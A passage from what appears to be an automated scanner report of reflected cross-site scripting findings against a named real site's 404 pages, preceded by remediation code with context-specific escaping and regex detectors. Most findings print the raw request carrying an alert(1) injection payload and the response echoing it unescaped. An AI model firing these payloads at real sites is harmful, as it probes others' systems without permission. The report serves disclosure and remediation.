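// The same page with each sink encoded for its own context. escapeJsString
// supplies the quotes around the JS literal, so the template has none.
function renderNotFoundSafe(requestUri) {
  const url = 'http://usa.kaspersky.com' + requestUri;
  return [
    `<link rel="canonical" href="${escapeHtmlAttr(url)}" />`,
    `<script>s.pageName=${escapeJsString('404:' + url)};</script>`,
  ].join('\n');
}

// Detectors for the two break-out shapes the scanner relied on: a new
// <script> element in the markup, and an unescaped quote that ends the JS
// literal so that -alert(1)- becomes an expression.
function hasInjectedScriptTag(html) {
  return /<script>alert\(1\)<\/script>/.test(html);
}
function hasJsStringBreakout(html) {
  return /(^|[^\\])"-alert\(1\)-"/.test(html);
}

// The exact request path from findings 1.67/1.68 around a given payload.
function probeUri(payload) {
  return '/sites/usa.kaspersky.com/files' + payload + '/css_injector_153.css?3';
}

console.log(renderNotFoundVulnerable(probeUri(ATTR_PAYLOAD)));
console.log(renderNotFoundSafe(probeUri(ATTR_PAYLOAD)));
console.log(renderNotFoundSafe(probeUri(JS_PAYLOAD)));
```

The design point is that one encoder is not enough for this page: the attribute needs HTML entity encoding, and the script literal needs JavaScript string encoding plus protection against "</script>", because the HTML parser ends the script element on that sequence regardless of JavaScript quoting. Applying HTML encoding to the JavaScript sink would leave "&quot;" inside the literal, which is harmless in that position, but applying JavaScript encoding to the attribute would not stop the "><script> break-out.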

1.69. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17380"-alert(1)-"a97d3645399 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/css_injector_153.css17380"-alert(1)-"a97d3645399?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387752"
Content-Type: text/html; charset=utf-8
Content-Length: 39279
Date: Sun, 23 Oct 2011 16:35:58 GMT
X-Varnish: 1652565905
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css17380"-alert(1)-"a97d3645399?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.70. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42389"><script>alert(1)</script>fe0bc3262be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_153.css42389"><script>alert(1)</script>fe0bc3262be?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387729"
Content-Type: text/html; charset=utf-8
Content-Length: 37876
Date: Sun, 23 Oct 2011 16:35:34 GMT
X-Varnish: 1652564616
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css42389"><script>alert(1)</script>fe0bc3262be?3" />
...[SNIP]...

1.71. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96bdd"-alert(1)-"6bfa7bc0a81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites96bdd"-alert(1)-"6bfa7bc0a81/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387373"
Content-Type: text/html; charset=utf-8
Content-Length: 39749
Date: Sun, 23 Oct 2011 16:29:45 GMT
X-Varnish: 1652547053
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites96bdd"-alert(1)-"6bfa7bc0a81/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-
...[SNIP]...

1.72. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43842"><script>alert(1)</script>e1e6eab895c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites43842"><script>alert(1)</script>e1e6eab895c/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387304"
Content-Type: text/html; charset=utf-8
Content-Length: 37708
Date: Sun, 23 Oct 2011 16:28:36 GMT
X-Varnish: 1652542990
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites43842"><script>alert(1)</script>e1e6eab895c/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.73. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cec1c"-alert(1)-"d595b6eb599 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.comcec1c"-alert(1)-"d595b6eb599/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:32:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387544"
Content-Type: text/html; charset=utf-8
Content-Length: 38883
Date: Sun, 23 Oct 2011 16:32:58 GMT
X-Varnish: 1652553972
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comcec1c"-alert(1)-"d595b6eb599/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.74. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3361"><script>alert(1)</script>27b501de15b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.coma3361"><script>alert(1)</script>27b501de15b/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387448"
Content-Type: text/html; charset=utf-8
Content-Length: 37684
Date: Sun, 23 Oct 2011 16:31:53 GMT
X-Varnish: 1652550051
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.coma3361"><script>alert(1)</script>27b501de15b/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.75. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97b0"><script>alert(1)</script>8427b1bbb6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/filesd97b0"><script>alert(1)</script>8427b1bbb6c/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387650"
Content-Type: text/html; charset=utf-8
Content-Length: 40718
Date: Sun, 23 Oct 2011 16:34:22 GMT
X-Varnish: 1652559309
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/filesd97b0"><script>alert(1)</script>8427b1bbb6c/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.76. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df6a"-alert(1)-"781c5a497bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files4df6a"-alert(1)-"781c5a497bf/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:44 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387684"
Content-Type: text/html; charset=utf-8
Content-Length: 40567
Date: Sun, 23 Oct 2011 16:34:55 GMT
X-Varnish: 1652561742
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files4df6a"-alert(1)-"781c5a497bf/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.77. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51137"><script>alert(1)</script>f1f4ddf51ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools51137"><script>alert(1)</script>f1f4ddf51ec/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387724"
Content-Type: text/html; charset=utf-8
Content-Length: 40549
Date: Sun, 23 Oct 2011 16:35:27 GMT
X-Varnish: 1652564197
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools51137"><script>alert(1)</script>f1f4ddf51ec/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.78. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d93"-alert(1)-"48e1557ded2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/ctools15d93"-alert(1)-"48e1557ded2/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387745"
Content-Type: text/html; charset=utf-8
Content-Length: 40398
Date: Sun, 23 Oct 2011 16:35:53 GMT
X-Varnish: 1652565598
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools15d93"-alert(1)-"48e1557ded2/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.79. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c719e"-alert(1)-"2c77cae502e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/ctools/cssc719e"-alert(1)-"2c77cae502e/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387796"
Content-Type: text/html; charset=utf-8
Content-Length: 39441
Date: Sun, 23 Oct 2011 16:36:42 GMT
X-Varnish: 1652568178
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/cssc719e"-alert(1)-"2c77cae502e/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.80. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4d14"><script>alert(1)</script>1573b83a4d3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/cssd4d14"><script>alert(1)</script>1573b83a4d3/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387781"
Content-Type: text/html; charset=utf-8
Content-Length: 38038
Date: Sun, 23 Oct 2011 16:36:25 GMT
X-Varnish: 1652567104
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/cssd4d14"><script>alert(1)</script>1573b83a4d3/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.81. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
